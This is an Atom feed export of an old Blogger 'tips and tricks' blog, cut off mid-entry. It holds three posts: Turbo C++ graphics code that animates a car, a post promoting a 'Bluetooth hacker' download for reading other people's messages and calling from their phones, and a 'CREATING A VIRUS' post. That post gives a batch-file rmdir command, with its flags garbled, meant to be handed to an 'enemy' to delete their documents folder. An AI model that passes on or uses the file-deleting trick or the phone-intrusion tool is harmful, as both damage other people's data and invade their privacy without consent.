<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss'><id>tag:blogger.com,1999:blog-698730440747916573</id><updated>2009-10-14T00:40:19.753-07:00</updated><title type='text'>wiйd◊wş тiÞş ẩйd тřickş</title><subtitle type='html'>This is the community any one can share their tips and tricks on computers
-------------------------------------------------
Please don't post unrelated topics Post those topics which will help to educate people
-------------------------------------------------
Feel free to comment on this community 
and give suggestions
-------------------------------------------------
*************************************************</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default?start-index=26&amp;max-results=25'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>40</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-570573172012440622</id><published>2007-11-27T02:31:00.000-08:00</published><updated>2007-11-28T10:50:00.658-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='animated car in c++'/><title type='text'>animated 3d car in c++</title><content type='html'>#include&lt;br /&gt;#include(conio.h&gt;&lt;br /&gt;#include(dos.h&gt;&lt;br /&gt;#include(stdlib.h&gt;&lt;br /&gt;#include(process.h&gt;&lt;br /&gt;void main()&lt;br /&gt;{&lt;br /&gt;   int gd=DETECT,gm;&lt;br /&gt;   initgraph(&amp;gd,&amp;gm,"c:\tc\bgi");&lt;br /&gt;int c=12;&lt;br /&gt;setbkcolor(0);&lt;br /&gt;//setlinestyle(0,1,2);&lt;br /&gt;int t;&lt;br /&gt;while(1)&lt;br /&gt;{&lt;br /&gt;settextstyle(2,0,5);&lt;br /&gt;outtextxy(100,10,"Press L,H ,T,P");&lt;br /&gt;outtextxy(100,30,"Press 1 for Quit");&lt;br /&gt;as:&lt;br /&gt;setcolor(13);&lt;br /&gt;ellipse(380,127,20,152,130,35);&lt;br /&gt;//////////////////////////////rear//////////////////////////&lt;br /&gt;line(490,109,560,142);&lt;br /&gt;line(560,142,569,142);&lt;br /&gt;line(569,142,582,102);&lt;br /&gt;line(582,102,620,92);&lt;br /&gt;line(593,132,617,125);&lt;br /&gt;line(617,124,627,96);&lt;br /&gt;line(620,92,628,97);&lt;br /&gt;line(472,86,602,96);&lt;br /&gt;line(501,113,575,121);&lt;br /&gt;line(443,77,475,80);&lt;br /&gt;line(443,77,432,93);&lt;br /&gt;line(475,80,472,85);&lt;br /&gt;//setcolor(4);&lt;br /&gt;   line(593,132,593,137);&lt;br /&gt;   line(593,137,600,141);&lt;br /&gt;   line(600,141,600,185);&lt;br /&gt;   line(600,185,608,192);&lt;br /&gt;   line(608,192,608,234);&lt;br /&gt;   line(608,234,586,253);&lt;br /&gt;    line(586,253,577,248);&lt;br /&gt;/////////////////////////           mirror&lt;br /&gt;   line(263,112,363,127);&lt;br /&gt;      line(193,160,263,112);&lt;br /&gt;   line(193,160,220,170);&lt;br /&gt;      line(220,170,280,180);&lt;br /&gt;      line(280,180,320,185);&lt;br /&gt;      line(320,185,363,127);&lt;br /&gt;////////////////////////////////sidemirror&lt;br /&gt;line(340,194,460,169);&lt;br /&gt; line(460,169,519,152);&lt;br /&gt;ellipse(512,144,300,30,10,10);&lt;br /&gt;ellipse(467,143,28,100,50,30);&lt;br /&gt;line(510,128,521,138);&lt;br /&gt;line(435,116,440,171);&lt;br /&gt;//   setcolor(4);           &lt;br /&gt;////////////////////////////////////////cont//&lt;br /&gt;   line(339,194,372,144);&lt;br /&gt;//    line(372,140,386,128);&lt;br /&gt;ellipse(454,208,87,123,128,95);&lt;br /&gt;line(372,144,384,128);&lt;br /&gt;   int b,x,y;&lt;br /&gt;////////////////////////lower&lt;br /&gt;line(365,298,524,264);&lt;br /&gt;line(365,298,330,310);&lt;br /&gt;line(330,310,323,310);&lt;br /&gt;&lt;br /&gt;///////////////////////////////bumper&lt;br /&gt;ellipse(162,221,135,190,90,40);&lt;br /&gt;line(96,193,140,174);&lt;br /&gt;line(140,174,160,168);&lt;br /&gt;line(160,168,192,161);&lt;br /&gt;//////////////////////front&lt;br /&gt;ellipse(75,246,95,190,18,18);&lt;br /&gt;line(57,251,57,286);&lt;br /&gt;//setcolor(4);&lt;br /&gt;ellipse(181,178,232,263,200,137);&lt;br /&gt;ellipse(195,180,256,286,200,137);&lt;br /&gt;&lt;br /&gt;ellipse(191,171,228,247,200,100);&lt;br /&gt;ellipse(231,198,234,275,200,80);&lt;br /&gt;//setcolor(9);&lt;br /&gt;//ellipse(195,170,256,286,200,137);&lt;br /&gt;//setcolor(12);&lt;br /&gt;ellipse(196,167,228,246,200,90);&lt;br /&gt;ellipse(231,184,234,276,200,80);&lt;br /&gt;&lt;br /&gt;ellipse(191,200,228,246,200,90);&lt;br /&gt;ellipse(228,218,234,276,200,80);&lt;br /&gt;ellipse(258,268,180,220,200,40);&lt;br /&gt;ellipse(178,296,244,355,16,10);&lt;br /&gt;ellipse(238,249,227,250,200,60);&lt;br /&gt;&lt;br /&gt;/////////////wheel1&lt;br /&gt;ellipse(302,281,320,77,26,45);&lt;br /&gt;ellipse(290,277,65,162,40,45);&lt;br /&gt;ellipse(278,288,144,212,31,45);&lt;br /&gt;/////////////wheel2&lt;br /&gt;//setcolor(5);&lt;br /&gt;ellipse(302+260,229,328,87,26,45);&lt;br /&gt;ellipse(290+280-7,277-50+2,90,162,40,45);&lt;br /&gt;ellipse(278+270,288-50,144,215,27,45);&lt;br /&gt; b=0;&lt;br /&gt;int v=0;&lt;br /&gt;/////////&lt;br /&gt;ellipse(302+250+v,227+b,295,90,29,41);&lt;br /&gt;ellipse(302+234+v,231+b,245,306,50,40);&lt;br /&gt;//setlinestyle(3,0,3);&lt;br /&gt;ellipse(302+248+v,229+b,0,360,21,30);&lt;br /&gt;ellipse(302+247+v,229+b,0,360,8,10);&lt;br /&gt;setfillstyle(6,11);&lt;br /&gt;//floodfill(302+248+v,230+b,13);&lt;br /&gt;//line(546,201,546,257);&lt;br /&gt;//line(554,201,554,257);&lt;br /&gt;//setcolor(4);&lt;br /&gt;line(546+v,201+b,546+v,220+b);&lt;br /&gt;line(551+v,201+b-2,551+v,220+b);&lt;br /&gt;line(546+v,238+b,546+v,257+b);&lt;br /&gt;line(551+v,238+b+2,551+v,257+b+2);&lt;br /&gt;&lt;br /&gt;line(530+v,225+b,541+v,225+b);&lt;br /&gt;line(530+v,230+b,541+v,230);&lt;br /&gt;line(557+v,225+b,570+v,225+b);&lt;br /&gt;line(557+v,230+b,570+v,230+b);&lt;br /&gt; &lt;br /&gt;line(563+v,206+b,552+v,222+b);&lt;br /&gt;line(534+v,246+b,543+v,232+b);&lt;br /&gt;line(566+v,210+b,556+v,223+b);&lt;br /&gt;line(536+v,250+b,544+v,238+b);&lt;br /&gt;line(536+v,207+b,546+v,222+b);&lt;br /&gt;line(532+v,213+b,542+v,224+b);&lt;br /&gt;line(556+v,235+b,566+v,247+b);&lt;br /&gt;line(551+v,237+b,563+v,253+b);&lt;br /&gt; &lt;br /&gt;////////////////////////////////////////////////////&lt;br /&gt;v=-260;&lt;br /&gt;b=56;&lt;br /&gt;ellipse(302+233+v,221+b,260,60,49,51);&lt;br /&gt;//ellipse(302+234+v,231+b,245,306,50,40);&lt;br /&gt;//setlinestyle(3,0,3);&lt;br /&gt;ellipse(302+243+v,224+b,0,360,28,35);&lt;br /&gt;//  line(249,328,269,328);&lt;br /&gt;ellipse(300+245+v,223+b,0,360,10,12);&lt;br /&gt;ellipse(285+249+v,239+b,210,260,30,33);&lt;br /&gt;//floodfill(285+258+v,230+b,12);&lt;br /&gt;b=45;&lt;br /&gt;v=v-4;&lt;br /&gt;line(546+v,201+b,546+v,220+b+2);&lt;br /&gt;line(551+v,201+b,551+v,220+b+2);&lt;br /&gt;b=b+8;&lt;br /&gt;line(546+v,238+b,546+v,257+b+4);&lt;br /&gt;line(551+v,238+b,551+v,257+b+4);&lt;br /&gt;v=v-2;&lt;br /&gt;line(530+v-6,225+b,541+v,225+b);&lt;br /&gt;line(530+v-6,230+b,541+v,230+b);&lt;br /&gt;v=v+5;&lt;br /&gt;line(557+v,225+b,570+v+3,225+b);&lt;br /&gt;line(557+v-1,230+b,570+v+3,230+b);&lt;br /&gt;&lt;br /&gt;b=b-5;&lt;br /&gt;v=v-5;&lt;br /&gt;line(565+v+3,206+b,552+v+4,222+b-2);&lt;br /&gt;b=b+15;&lt;br /&gt;line(534+v,246+b,543+v+3,232+b-5);&lt;br /&gt;b=b-10;&lt;br /&gt;line(566+v+7,210+b-5,556+v+4,220+b);&lt;br /&gt;line(536+v-5,250+b,544+v-2,238+b-4);&lt;br /&gt;&lt;br /&gt;line(536+v,207+b-8,545+v,222+b-5);&lt;br /&gt;line(531+v,212+b-8,542+v,224+b-2);&lt;br /&gt;line(556+v,235+b,566+v+3,247+b+5);&lt;br /&gt;line(551+v,237+b,563+v+2,253+b+3);&lt;br /&gt;///////////////////lights&lt;br /&gt;ellipse(199,250,144,345,18,8);&lt;br /&gt;line(185,245,206,230);&lt;br /&gt;//setcolor(4);&lt;br /&gt;ellipse(223,234,340,110,8,5);&lt;br /&gt;line(230,237,217,252);&lt;br /&gt;line(206,230,220,229);&lt;br /&gt;//setfillstyle(1,4);&lt;br /&gt;//floodfill(200,240,12);&lt;br /&gt;/////////////////////////////////////&lt;br /&gt;line(90,223,152,236);&lt;br /&gt;line(152,236,137,254);&lt;br /&gt;line(90,223,90,242);&lt;br /&gt;//setfillstyle(10,9);&lt;br /&gt;//floodfill(91,230,14);&lt;br /&gt;ellipse(240,270,104,136,100,60);&lt;br /&gt;ellipse(185,237,120,160,100,60);&lt;br /&gt;ellipse(80,221,357,134,10,10);&lt;br /&gt;line(152,236,168,228);&lt;br /&gt;///////////////////////////////////////////////&lt;br /&gt;line(435,116,440,171);&lt;br /&gt;//////////////////////////////////////////hp&lt;br /&gt;//line(134,185,220,210);&lt;br /&gt;line(134,185,196,160);&lt;br /&gt;line(214,212,318,185);&lt;br /&gt;/////////////////////////////////////////////////light&lt;br /&gt;//setcolor(14);&lt;br /&gt;ellipse(166,247,99,330,8,8);&lt;br /&gt;ellipse(171,243,310,129,7,7);&lt;br /&gt;putpixel(174,250,13);&lt;br /&gt;putpixel(173,251,13);&lt;br /&gt;putpixel(164,239,13);&lt;br /&gt;putpixel(165,238,13);&lt;br /&gt;/////////////////////////////////////////road/////////////////////&lt;br /&gt;setcolor(13);&lt;br /&gt;line(1,430,639,300);&lt;br /&gt;line(1,445,639,315);&lt;br /&gt;line(1,210,93,194);&lt;br /&gt;line(1,195,194,158);&lt;br /&gt;//line(1,170,639,71);&lt;br /&gt;//line(1,170,229,135);&lt;br /&gt;line(520,90,639,71);&lt;br /&gt;line(478,86,639,56);&lt;br /&gt;   int c=0;&lt;br /&gt;   line(10,194+c,10,208+c);&lt;br /&gt;line(40,189+c,40,204+c);&lt;br /&gt;line(70,183+c,70,198+c);&lt;br /&gt;line(100,176+c,100,190+c);&lt;br /&gt;line(130,170+c,130,177+c);&lt;br /&gt;line(160,166+c,160,168+c);&lt;br /&gt;line(190,160+c,190,161+c);&lt;br /&gt; line(190+330,78+c,190+330,89+c);&lt;br /&gt;line(190+360,72+c,190+360,85+c);&lt;br /&gt;line(190+390,67+c,190+390,81+c);&lt;br /&gt;line(190+420,62+c,190+420,76+c);&lt;br /&gt;line(190+449,57+c,190+449,71+c);&lt;br /&gt; &lt;br /&gt;   c=236;&lt;br /&gt;line(10,192+c,10,208+c);&lt;br /&gt;line(40,189+c-2,40,204+c-3);&lt;br /&gt;line(70,183+c-3,70,198+c-3);&lt;br /&gt;line(100,176+c-2,100,190+c-2);&lt;br /&gt;line(130,170+c-2,130,177+c+5);&lt;br /&gt;line(160,166+c-3,160,168+c+8);&lt;br /&gt;line(190,160+c-4,190,161+c+9);&lt;br /&gt;line(190+30,156+c-5,190+30,170+c-5);&lt;br /&gt;&lt;br /&gt;line(190+30+30,156+c-12,190+30+30,170+c-12);&lt;br /&gt;line(190+90,156+c-18,190+90,170+c-17);&lt;br /&gt;line(190+120,156+c-25,190+120,170+c-25);&lt;br /&gt;line(190+150,156+c-30,190+150,170+c-30);&lt;br /&gt;line(190+180,156+c-37,190+180,170+c-36);&lt;br /&gt;&lt;br /&gt;line(190+210,156+c-42,190+210,170+c-42);&lt;br /&gt;&lt;br /&gt;line(190+240,156+c-48,190+240,170+c-48);&lt;br /&gt;&lt;br /&gt;line(190+270,156+c-55,190+270,170+c-54);&lt;br /&gt;&lt;br /&gt;line(190+300,156+c-61,190+300,170+c-61);&lt;br /&gt; &lt;br /&gt; line(190+330,78+c+10,190+330,89+c+13);&lt;br /&gt;line(190+360,72+c+11,190+360,85+c+13);&lt;br /&gt;line(190+390,67+c+10,190+390,81+c+10);&lt;br /&gt;line(190+420,62+c+8,190+420,76+c+10);&lt;br /&gt;line(190+449,57+c+8,190+449,71+c+8);&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;/////////////////road&lt;br /&gt;setcolor(12);          /////////////////////////////1&lt;br /&gt;line(1,310,25,306);&lt;br /&gt;line(6,318,30,315);&lt;br /&gt;line(1,310,6,318);&lt;br /&gt;line(25,306,30,314);&lt;br /&gt;int k,m;&lt;br /&gt;k=13*45+19;&lt;br /&gt;m=16*(-8);&lt;br /&gt;          //2&lt;br /&gt;setcolor(12);&lt;br /&gt;line(605,310-128,629,306-128);&lt;br /&gt;line(610,318-128,634,315-128);&lt;br /&gt;line(605,310-128,610,318-128);&lt;br /&gt;line(629,306-128,634,314-128);&lt;br /&gt;setcolor(12);    //////////////////////////////////3&lt;br /&gt;k=45;&lt;br /&gt;m=-8;&lt;br /&gt;line(46,302,70,298);&lt;br /&gt;line(51,310,75,307);&lt;br /&gt;line(46,302,51,310);&lt;br /&gt;line(70,298,75,306);&lt;br /&gt;&lt;br /&gt;setfillstyle(1,0);&lt;br /&gt;floodfill(64,303,12);&lt;br /&gt;setfillstyle(1,14);&lt;br /&gt;floodfill(14,314,12);&lt;br /&gt;floodfill(617,183,12);&lt;br /&gt;setfillstyle(1,0);&lt;br /&gt;floodfill(14,314,12);&lt;br /&gt;floodfill(617,183,12);&lt;br /&gt;setfillstyle(1,14);&lt;br /&gt;floodfill(64,303,12);&lt;br /&gt;t=getch();&lt;br /&gt;if(t=='1')&lt;br /&gt;exit(0);&lt;br /&gt;if(t=='h')&lt;br /&gt;{&lt;br /&gt;sound(710);&lt;br /&gt;delay(500);&lt;br /&gt;nosound();&lt;br /&gt;//break;&lt;br /&gt;}&lt;br /&gt;if(t=='t')&lt;br /&gt;{&lt;br /&gt;while(!kbhit())  {&lt;br /&gt;setfillstyle(1,0);&lt;br /&gt;floodfill(536,213,13);&lt;br /&gt;floodfill(563,213,13);&lt;br /&gt;floodfill(561,244,13);&lt;br /&gt;floodfill(538,244,13);&lt;br /&gt;floodfill(274,295,13);&lt;br /&gt;floodfill(294,295,13);&lt;br /&gt;floodfill(274,265,13);&lt;br /&gt;floodfill(294,265,13);&lt;br /&gt;floodfill(548,250,13);&lt;br /&gt;floodfill(548,214,13);&lt;br /&gt;floodfill(533,228,13);&lt;br /&gt;floodfill(563,228,13);&lt;br /&gt;floodfill(262,281,13);&lt;br /&gt;floodfill(308,281,13);&lt;br /&gt;floodfill(284,251,13);&lt;br /&gt;floodfill(284,295,13);&lt;br /&gt;setfillstyle(1,random(12));&lt;br /&gt;floodfill(200,250,13);&lt;br /&gt;delay(10);&lt;br /&gt;//setfillstyle(1,11);&lt;br /&gt; floodfill(170,250,13);&lt;br /&gt; floodfill(80,230,13);&lt;br /&gt;&lt;br /&gt; }&lt;br /&gt;setfillstyle(1,0);&lt;br /&gt;floodfill(200,250,13);&lt;br /&gt;delay(10);&lt;br /&gt;//setfillstyle(1,11);&lt;br /&gt; floodfill(170,250,13);&lt;br /&gt; floodfill(80,230,13);&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt;if(t=='l')&lt;br /&gt;{&lt;br /&gt;while(!kbhit())&lt;br /&gt;{&lt;br /&gt;delay(120);&lt;br /&gt;setfillstyle(6,0);         //////////////////////////ty&lt;br /&gt;floodfill(536,213,13);&lt;br /&gt;floodfill(563,213,13);&lt;br /&gt;floodfill(561,244,13);&lt;br /&gt;floodfill(538,244,13);&lt;br /&gt;floodfill(274,295,13);&lt;br /&gt;floodfill(294,295,13);&lt;br /&gt;floodfill(274,265,13);&lt;br /&gt;floodfill(294,265,13);&lt;br /&gt;setfillstyle(1,0);&lt;br /&gt;floodfill(64,303,12);&lt;br /&gt;///////////////////////////////////road&lt;br /&gt;setfillstyle(9,0);       /////////////////////color&lt;br /&gt;floodfill(81-40+5,419+7,13);&lt;br /&gt;floodfill(151-40,409+7,13);&lt;br /&gt;floodfill(211-40,397+7,13);&lt;br /&gt;floodfill(271-40,380+7,13);&lt;br /&gt;floodfill(331-40,368+7,13);&lt;br /&gt;floodfill(396-40,355+7,13);&lt;br /&gt;floodfill(450-40,345+7,13);&lt;br /&gt;floodfill(510-40,335+7,13);&lt;br /&gt;floodfill(570-40,325+7,13);&lt;br /&gt;floodfill(630-40,312+7,13);&lt;br /&gt;&lt;br /&gt;//////////////////////&lt;br /&gt;floodfill(50,197,13);&lt;br /&gt;floodfill(110,177,13);&lt;br /&gt;floodfill(166,165,13);&lt;br /&gt;floodfill(527,86,13);&lt;br /&gt;floodfill(587,71,13);&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;setfillstyle(6,14); //////////////////////////ty&lt;br /&gt;floodfill(548,250,13);&lt;br /&gt;floodfill(548,214,13);&lt;br /&gt;floodfill(533,228,13);&lt;br /&gt;floodfill(563,228,13);&lt;br /&gt;floodfill(262,281,13);&lt;br /&gt;floodfill(308,281,13);&lt;br /&gt;floodfill(284,251,13);&lt;br /&gt;floodfill(284,295,13);&lt;br /&gt;////////////////////////////////////////road&lt;br /&gt;setfillstyle(9,10);///////////////////////////////////color&lt;br /&gt;floodfill(19,429,13);&lt;br /&gt;floodfill(81,419,13);&lt;br /&gt;floodfill(151,409,13);&lt;br /&gt;floodfill(211,397,13);&lt;br /&gt;floodfill(271,380,13);&lt;br /&gt;floodfill(331,368,13);&lt;br /&gt;floodfill(396,355,13);&lt;br /&gt;floodfill(450,345,13);&lt;br /&gt;floodfill(510,335,13);&lt;br /&gt;floodfill(570,325,13);&lt;br /&gt;floodfill(630,312,13);&lt;br /&gt;//////////////////////////////////////&lt;br /&gt;floodfill(20,197,13);&lt;br /&gt;floodfill(80,187,13);&lt;br /&gt;floodfill(133,174,13);&lt;br /&gt;floodfill(517,86,13);&lt;br /&gt;floodfill(557,81,13);&lt;br /&gt;floodfill(627,70,13);&lt;br /&gt;setfillstyle(1,14);&lt;br /&gt;floodfill(14,314,12);&lt;br /&gt;floodfill(617,183,12);&lt;br /&gt;///////////////////////////////////////&lt;br /&gt;setfillstyle(10,4);&lt;br /&gt;floodfill(302+248,230,13);&lt;br /&gt;floodfill(302+248+v,230+b,13);&lt;br /&gt;///light&lt;br /&gt;setfillstyle(6,11);                             ///////////&lt;br /&gt;floodfill(200,250,13);&lt;br /&gt;floodfill(170,250,13);&lt;br /&gt; floodfill(80,230,13);&lt;br /&gt;delay(120);&lt;br /&gt;setfillstyle(6,0);/////////////////////ty&lt;br /&gt;floodfill(548,250,13);&lt;br /&gt;floodfill(548,214,13);&lt;br /&gt;floodfill(533,228,13);&lt;br /&gt;floodfill(563,228,13);&lt;br /&gt;floodfill(262,281,13);&lt;br /&gt;floodfill(308,281,13);&lt;br /&gt;floodfill(284,251,13);&lt;br /&gt;floodfill(284,295,13);&lt;br /&gt;/////////////////////////////////////road&lt;br /&gt;setfillstyle(9,0);      ///////////////color&lt;br /&gt;floodfill(19,429,13);&lt;br /&gt;floodfill(81,419,13);&lt;br /&gt;floodfill(151,409,13);&lt;br /&gt;floodfill(211,397,13);&lt;br /&gt;floodfill(271,380,13);&lt;br /&gt;floodfill(331,368,13);&lt;br /&gt;floodfill(396,355,13);&lt;br /&gt;floodfill(450,345,13);&lt;br /&gt;floodfill(510,335,13);&lt;br /&gt;floodfill(570,325,13);&lt;br /&gt;floodfill(630,312,13);&lt;br /&gt;///////////////////////////////////////////////////////&lt;br /&gt;floodfill(20,197,13);&lt;br /&gt;floodfill(80,187,13);&lt;br /&gt;floodfill(133,174,13);&lt;br /&gt;floodfill(517,86,13);&lt;br /&gt;floodfill(557,81,13);&lt;br /&gt;floodfill(627,70,13);&lt;br /&gt;/////////////////////////////&lt;br /&gt;setfillstyle(1,0);&lt;br /&gt;floodfill(14,314,12);&lt;br /&gt;floodfill(617,183,12);&lt;br /&gt;setfillstyle(6,10);            /////////////ty&lt;br /&gt;floodfill(536,213,13);&lt;br /&gt;floodfill(563,213,13);&lt;br /&gt;floodfill(561,244,13);&lt;br /&gt;floodfill(538,244,13);&lt;br /&gt;floodfill(274,295,13);&lt;br /&gt;floodfill(294,295,13);&lt;br /&gt;floodfill(274,265,13);&lt;br /&gt;floodfill(294,265,13);&lt;br /&gt;////////////////////////////////////////////////road&lt;br /&gt;setfillstyle(9,14);/////////////////////////////////////////color&lt;br /&gt;floodfill(81-40+5,419+7,13);&lt;br /&gt;floodfill(151-40,409+7,13);&lt;br /&gt;floodfill(211-40,397+7,13);&lt;br /&gt;floodfill(271-40,380+7,13);&lt;br /&gt;floodfill(331-40,368+7,13);&lt;br /&gt;floodfill(396-40,355+7,13);&lt;br /&gt;floodfill(450-40,345+7,13);&lt;br /&gt;floodfill(510-40,335+7,13);&lt;br /&gt;floodfill(570-40,325+7,13);&lt;br /&gt;floodfill(630-40,312+7,13);&lt;br /&gt;/////////////////////////////////////////&lt;br /&gt;floodfill(50,197,13);&lt;br /&gt;floodfill(110,177,13);&lt;br /&gt;floodfill(166,165,13);&lt;br /&gt;floodfill(527,86,13);&lt;br /&gt;floodfill(587,71,13);&lt;br /&gt;setfillstyle(1,14);&lt;br /&gt;floodfill(64,303,12);&lt;br /&gt;setfillstyle(9,4);&lt;br /&gt;floodfill(302+248,230,13);&lt;br /&gt;floodfill(302+248+v,230+b,13);&lt;br /&gt;delay(20);&lt;br /&gt;setfillstyle(1,14);&lt;br /&gt;floodfill(200,250,13);&lt;br /&gt;floodfill(170,250,13);&lt;br /&gt; floodfill(80,230,13);&lt;br /&gt; delay(20);&lt;br /&gt;setfillstyle(1,0);&lt;br /&gt;floodfill(200,250,13);&lt;br /&gt;floodfill(170,250,13);&lt;br /&gt; floodfill(80,230,13);&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;}          }&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;if(t=='p')&lt;br /&gt;{&lt;br /&gt;int n=0;&lt;br /&gt;while(!kbhit())&lt;br /&gt;{&lt;br /&gt;if(n&lt;=60)&lt;br /&gt;n++;&lt;br /&gt;setcolor(0);&lt;br /&gt;rectangle(1+1,-10,90-1,-12+n);&lt;br /&gt;delay(14);&lt;br /&gt;setcolor(9);&lt;br /&gt;rectangle(1,-10,90,-10+n);&lt;br /&gt;if(n==60)&lt;br /&gt;{&lt;br /&gt;outtextxy(10,10,"L-LIGHTS");&lt;br /&gt;outtextxy(10,20,"H-HORN");&lt;br /&gt;//outtextxy(10,30,"T-AllOY");&lt;br /&gt; delay(400);&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;setcolor(0);&lt;br /&gt;rectangle(1,-10,90,-10+n);&lt;br /&gt;rectangle(1,-10,90,-11+n);&lt;br /&gt;outtextxy(10,10,"L-LIGHTS");&lt;br /&gt;outtextxy(10,20,"H-HORN");&lt;br /&gt;//outtextxy(10,30,"T-AllOY");&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt; &lt;br /&gt;circle(300,100,3);&lt;br /&gt;nosound();&lt;br /&gt;getch();&lt;br /&gt;}&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-570573172012440622?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/570573172012440622/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=570573172012440622' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/570573172012440622'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/570573172012440622'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/animated-3d-car-in-c.html' title='animated 3d car in c++'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-1980196770305116906</id><published>2007-11-26T03:23:00.000-08:00</published><updated>2007-11-26T03:44:17.278-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mobile bluetooth hacker'/><title type='text'>mobile bluetooth hacker</title><content type='html'>mobile bluetooth hacker &lt;br /&gt;&lt;br /&gt;Yes guys it is the super mobile bluetooth hacker&lt;br /&gt;Once connected to a another phone via bluetooth you can:&lt;br /&gt;- read his messages&lt;br /&gt;- read his contacts&lt;br /&gt;- change profile&lt;br /&gt;- play his ringtone even if phone is on silent&lt;br /&gt;- play his songs(in his phone)&lt;br /&gt;- restart the phone&lt;br /&gt;- switch off the phone&lt;br /&gt;- restore factory settings&lt;br /&gt;- change ringing volume&lt;br /&gt;- And here comes the best&lt;br /&gt;Call from his phone" it includes all call functions like hold etc.&lt;br /&gt;Notes:&lt;br /&gt;1.) When connecting devices use a code 0000&lt;br /&gt;2.) At start of programm on smartphones do not forget to turn on bluetooth before start of the application&lt;br /&gt;What else you want&lt;br /&gt;Just go and download it&lt;br /&gt;&lt;a href="http://rapidshare.com/files/62505388/Super_Bluetooth_Hack_v1.07.rar"&gt;download&lt;/a&gt;&lt;br /&gt;enjoy and keep visiting us&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-1980196770305116906?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/1980196770305116906/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=1980196770305116906' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/1980196770305116906'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/1980196770305116906'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/mobile-bluetooth-hacker.html' title='mobile bluetooth hacker'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-6536201086497958336</id><published>2007-11-25T11:25:00.001-08:00</published><updated>2007-11-25T11:25:28.346-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='CREATING A VIRUS'/><title type='text'>CREATING A VIRUS</title><content type='html'>HERE'S A WAY I FOUND TO DELETE THE MY DOCUMENTS FOLDER OF UR ENEMY OR JUST 4 FUN.HERE'S WHAT U SHOULD DO.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT BE SURE TO SAVE IT AS A BAT FILE.I MEAN SAVE IT LIKE MYVIRUS.BAT.IT SHOULD HAVE THE ENDING AS .BAT.NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;rmdir C:\Documents and Settings \S\Q.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-6536201086497958336?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/6536201086497958336/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=6536201086497958336' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/6536201086497958336'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/6536201086497958336'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/creating-virus.html' title='CREATING A 